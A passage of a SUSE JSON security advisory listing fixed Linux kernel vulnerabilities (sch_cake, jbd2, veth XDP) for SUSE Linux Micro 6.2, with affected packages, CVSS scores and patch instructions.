"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68320"
},
{
"cve": "CVE-2025-68325",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68325"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_cake: Fix incorrect qlen reduction in cake_drop\n\nIn cake_drop(), qdisc_tree_reduce_backlog() is used to update the qlen\nand backlog of the qdisc hierarchy. Its caller, cake_enqueue(), assumes\nthat the parent qdisc will enqueue the current packet. However, this\nassumption breaks when cake_enqueue() returns NET_XMIT_CN: the parent\nqdisc stops enqueuing current packet, leaving the tree qlen/backlog\naccounting inconsistent. This mismatch can lead to a NULL dereference\n(e.g., when the parent Qdisc is qfq_qdisc).\n\nThis patch computes the qlen/backlog delta in a more robust way by\nobserving the difference before and after the series of cake_drop()\ncalls, and then compensates the qdisc tree accounting if cake_enqueue()\nreturns NET_XMIT_CN.\n\nTo ensure correct compensation when ACK thinning is enabled, a new\nvariable is introduced to keep qlen unchanged.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68325",
"url": "https://www.suse.com/security/cve/CVE-2025-68325"
},
{
"category": "external",
"summary": "SUSE Bug 1255417 for CVE-2025-68325",
"url": "https://bugzilla.suse.com/1255417"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68325"
},
{
"cve": "CVE-2025-68337",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68337"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\njbd2: avoid bug_on in jbd2_journal_get_create_access() when file system corrupted\n\nThere\u0027s issue when file system corrupted:\n------------[ cut here ]------------\nkernel BUG at fs/jbd2/transaction.c:1289!\nOops: invalid opcode: 0000 [#1] SMP KASAN PTI\nCPU: 5 UID: 0 PID: 2031 Comm: mkdir Not tainted 6.18.0-rc1-next\nRIP: 0010:jbd2_journal_get_create_access+0x3b6/0x4d0\nRSP: 0018:ffff888117aafa30 EFLAGS: 00010202\nRAX: 0000000000000000 RBX: ffff88811a86b000 RCX: ffffffff89a63534\nRDX: 1ffff110200ec602 RSI: 0000000000000004 RDI: ffff888100763010\nRBP: ffff888100763000 R08: 0000000000000001 R09: ffff888100763028\nR10: 0000000000000003 R11: 0000000000000000 R12: 0000000000000000\nR13: ffff88812c432000 R14: ffff88812c608000 R15: ffff888120bfc000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f91d6970c99 CR3: 00000001159c4000 CR4: 00000000000006f0\nCall Trace:\n \u003cTASK\u003e\n __ext4_journal_get_create_access+0x42/0x170\n ext4_getblk+0x319/0x6f0\n ext4_bread+0x11/0x100\n ext4_append+0x1e6/0x4a0\n ext4_init_new_dir+0x145/0x1d0\n ext4_mkdir+0x326/0x920\n vfs_mkdir+0x45c/0x740\n do_mkdirat+0x234/0x2f0\n __x64_sys_mkdir+0xd6/0x120\n do_syscall_64+0x5f/0xfa0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nThe above issue occurs with us in errors=continue mode when accompanied by\nstorage failures. There have been many inconsistencies in the file system\ndata.\nIn the case of file system data inconsistency, for example, if the block\nbitmap of a referenced block is not set, it can lead to the situation where\na block being committed is allocated and used again. As a result, the\nfollowing condition will not be satisfied then trigger BUG_ON. Of course,\nit is entirely possible to construct a problematic image that can trigger\nthis BUG_ON through specific operations. In fact, I have constructed such\nan image and easily reproduced this issue.\nTherefore, J_ASSERT() holds true only under ideal conditions, but it may\nnot necessarily be satisfied in exceptional scenarios. Using J_ASSERT()\ndirectly in abnormal situations would cause the system to crash, which is\nclearly not what we want. So here we directly trigger a JBD abort instead\nof immediately invoking BUG_ON.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68337",
"url": "https://www.suse.com/security/cve/CVE-2025-68337"
},
{
"category": "external",
"summary": "SUSE Bug 1255482 for CVE-2025-68337",
"url": "https://bugzilla.suse.com/1255482"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68337"
},
{
"cve": "CVE-2025-68341",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68341"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nveth: reduce XDP no_direct return section to fix race\n\nAs explain in commit fa349e396e48 (\"veth: Fix race with AF_XDP exposing\nold or uninitialized descriptors\") for veth there is a chance after\nnapi_complete_done() that another CPU can manage start another NAPI\ninstance running veth_pool(). For NAPI this is correctly handled as the\nnapi_schedule_prep() check will prevent multiple instances from getting\nscheduled, but for the remaining code in veth_pool() this can run\nconcurrent with the newly started NAPI instance.\n\nThe problem/race is that xdp_clear_return_frame_no_direct() isn\u0027t\ndesigned to be nested.\n\nPrior to commit 401cb7dae813 (\"net: Reference bpf_redirect_info via\ntask_struct on PREEMPT_RT.\") the temporary BPF net context\nbpf_redirect_info was stored per CPU, where this wasn\u0027t an issue. Since\nthis commit the BPF context is stored in \u0027current\u0027 task_struct. When\nrunning veth in threaded-NAPI mode, then the kthread becomes the storage\narea. Now a race exists between two concurrent veth_pool() function calls\none exiting NAPI and one running new NAPI, both using the same BPF net\ncontext.\n\nRace is when another CPU gets within the xdp_set_return_frame_no_direct()\nsection before exiting veth_pool() calls the clear-function\nxdp_clear_return_frame_no_direct().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68341",
"url": "https://www.suse.com/security/cve/CVE-2025-68341"
},
{
"category": "external",
"summary": "SUSE Bug 1255506 for CVE-2025-68341",
"url": "https://bugzilla.suse.com/1255506"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
